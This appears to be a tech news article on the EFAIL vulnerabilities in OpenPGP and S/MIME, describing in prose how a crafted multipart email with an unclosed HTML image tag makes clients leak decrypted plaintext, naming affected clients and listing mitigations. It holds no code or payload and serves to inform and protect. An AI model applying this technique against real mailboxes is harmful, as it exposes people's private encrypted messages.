EFAIL is the name of a new set of vulnerabilities that allow attackers to exploit issues in OpenPGP and S/Mime to gain access to encrypted messages.

OpenPGP is an encryption standard that Internet users may use to protect sensitive data such as emails by using encryption. S/Mime is another standard that is widely used in corporate environments.

EFAIL requires that the attacker managed to gain access to encrypted emails and that the target runs client software that is vulnerable to one of the two available attack types.

An attacker could gain access to encrypted emails by monitoring network traffic, compromising email servers or the computers of users, or gaining access to backup servers.

The attack works in the following way:

• The attacker manages to get hold of an encrypted email.
• The encrypted email is modified and send to the target.
• The client used by the target decrypts the email and loads external content that transmits the plaintext message to the attacker.

The attacker may use two different types of attacks. The first is called direct exfiltration by the developers. It works in clients such as Mozilla Thunderbird, Postbox, MailMate, iOS Mail or Apple Mail and enables the attacker to exfiltrate the plaintext message of the encrypted email directly.

This attack works in the following way:

1. The attacker creates a new multipart email message and prepares it in a special way. It consists of three parts:

1. An HTML image tag that uses a src attribute that is opened with quotes but not closed.
2. The actual encrypted message using PGP or S/Mime.
3. The third part closes the open HTML tag of the first part

2. The message is send to the target.
3. The target's email client processes the email. It loads the referenced image and attaches the plaintext message that it decrypted to the image URL.
4. The attacker monitors hits to the server and gets hold of the secret message tis way.

The second attack type works against a larger number of email clients. In fact, the only clients protected against S/Mime attacks are Claws Mail and Mutt whereas more clients are protected against PGP-targeting attacks.

What can you do to protect yourself?

The researchers suggest the following mitigation strategies:

• Short Term: Disable decryption of S/Mime or PGP emails in the email client. Copy and paste the encrypted text into separate programs to decrypt the text.
• Short Term: Disable HTML rendering in the email client for all email messages.
• Medium Term: Software companies need to patch the issues in their client applications.
• Long Term: OpenPGP and S/Mime standards need to be updated.

While not explicitly mentioned, you may also disable the loading of remote content in the email client to prevent successful exploits.

Thunderbird users may want to check out our guide Switch Between HTML And Plain Text Emails In Thunderbird to enable plaintext email messages in the client. It is furthermore advised to disable the loading of any remote content by disabling "allow remote content in messages" under Tools > Options > Privacy.

Additional information about the vulnerability is available on the website the researchers created.